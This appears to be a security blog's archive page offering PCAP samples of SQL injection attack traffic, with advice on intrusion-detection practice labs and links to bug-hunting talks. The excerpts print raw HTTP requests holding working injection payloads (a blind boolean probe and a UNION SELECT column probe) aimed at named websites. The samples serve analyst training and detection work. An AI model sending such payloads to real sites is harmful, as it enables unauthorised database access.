Category Archives: Web Application Attacks

Active Business Directory v2 Remote Blind SQL Injection Attack Exploit Traffic PCAP

Download Active Business Directory Remote Blind SQL Injection PCAP: remoteblindsql.pcap

2009-01-01 09:36:59.374040 PPPoE [ses 0x976] IP 117.195.143.198.2308 > 208.106.128.136.80: Flags [P.], seq 1:438, ack 1, win 65535, length 437: HTTP: GET /demoactivebusinessdirectory/default.asp?catid=0+and+1=0 HTTP/1.1

GET /demoactivebusinessdirectory/default.asp?catid=0+and+1=0 HTTP/1.1
Host: www.activewebsoftwares.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8… Read More »


Capsule Sticker Remote SQL Injection Vulnerability SQLi Exploit PCAP Traffic Sample

Download Capsule Sticker SQL Injection PCAP: stickersqli

2009-01-01 09:30:19.647159 PPPoE [ses 0x976] IP 117.195.143.198.2131 > 203.146.140.17.80: Flags [P.], seq 1:820, ack 1, win 65535, length 819: HTTP: GET /homenew//sticker/sticker.php?id=1%27+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/* HTTP/1.1

GET /homenew//sticker/sticker.php?id=1%27+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/* HTTP/1.1
Host: www.musicza.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-gb,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset:… Read More »


So you want a job as a Network Security Analyst? Network Intrusion Detection Practice

Network security analysis takes a lot of experience, and the best way to get real-world experience is to set up your own test lab. Download Wireshark and tcpdump; these tools will be used to monitor the live traffic you generate. Make sure you have some type of virtual machine software and… Read More »


How To Break Web Software – A look at security vulnerabilities in web software

Google Tech Talk on Website Application Security Vulnerabilities and Mitigation Strategies  


Bug Hunting Bounties – Finding Website Vulnerabilities – How To Shot Web – Jason Haddix’s talk from DEFCON23

Jason Haddix explores successful tactics and tools used by himself and the best bug hunters. Practical methodologies, tools and tips that make you better at hacking websites and mobile apps to claim those bug bounties. Download Slides Here: http://www.slideshare.net/bugcrowd/how-do-i-shot-web-jason-haddix-at-defcon-23  
